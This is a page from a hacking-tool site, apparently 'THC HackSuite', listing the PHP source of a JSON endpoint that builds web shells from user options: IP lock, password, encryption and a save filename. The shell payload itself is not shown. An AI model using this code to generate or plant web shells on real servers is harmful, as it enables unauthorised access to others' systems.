random gallery image
random tutorial
preview..we will make a new module and not just some new module, nope let's make a fully automatic injection script! This tutorial is the first step into making this. Let's first explain what..
random information gathering
THC Sscan
THC Sscan is a very versatile tool for scanning (html) files
HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/*
JSON requests for creating shells based upon user input.
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
$_DYNAMIC_ROOT = "../../..";
include_once("../../../header.php");
include_once("header.php");
$cTHC = new THC();
$aDataR = array();
$aDataR['jresult'] = false;
$aDataR['jmessage'] = "Invalid request received.";
if(isset($_POST['sProduct'])){
$sFile = "../".$cTHC->ExploitFilter("forums/".$_POST['sProduct'],0,1);
@include_once($sFile);
$bFail = false;
if(!isset($_SYSTEM)){
$aDataR['jmessage'] = "No shell data in this file.";
}
else{
$_OPTIONS = array();
if(isset($_POST['iEncrypt'])){
// encrypt options
if(isset($_POST['sEncrypt']) && $_POST['sEncrypt']!="normal"){
$_POST['sEncrypt']= "impossibru";
}
else{
$_POST['sEncrypt']= "normal";
}
$_OPTIONS['encrypt'] = $_POST['sEncrypt'];
}
if(isset($_POST['iSave'],$_POST['sFileName'],$_POST['sExtension'])){
// save options
$sFileName = "../../../Shells/".$cTHC->ExploitFilter($_POST['sFileName'].$_POST['sExtension'],0,1);
if(file_exists($sFileName)){
$bFail = true;
$aDataR['jmessage'] = "File already exists.";
}
else{
$_OPTIONS['shellcreate'] = $sFileName;
}
}
if(isset($_POST['iIP']) && !$bFail){
// ip options
if(!filter_var($_POST['sIP'],FILTER_VALIDATE_IP)){
$bFail = true;
$aDataR['jmessage'] = "Invalid ip address specified.";
}
else{
$_OPTIONS['ip'] = $_POST['sIP'];
}
}
if(isset($_POST['iPass']) && !$bFail){
// password options
if(!isset($_POST['sPass1'],$_POST['sPass2']) || $_POST['sPass1']=="" || $_POST['sPass1']!=$_POST['sPass2']){
$aDataR['jmessage'] = "No password specified or passwords don't match.";
$bFail = true;
}
else{
$_OPTIONS['pass'] = $_POST['sPass1'];
}
}
}
if(!$bFail){
$sResult = $cTHC->MedusaShell($_SYSTEM,$_OPTIONS);
if(is_bool($sResult)){
if(!$sResult){
$aDataR['jmessage'] = "Failed to create shell.";
}
else{
$aDataR['jmessage'] = "Successfully created shell.";
$aDataR['jresult'] = true;
}
}
else{
$aDataR['jresult'] = true;
$aDataR['jshell'] = $sResult;
}
}
}
session_cache_limiter('nocache');
header('Expires: '.gmdate('r',0));
header('Content-type: application/json; character-set=utf-8;');
die(json_encode($aDataR));
?>
powered by
site stats
cms statistics:
version: 0.6.0downloads: 4384
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
site resources
remote resources
partners and friends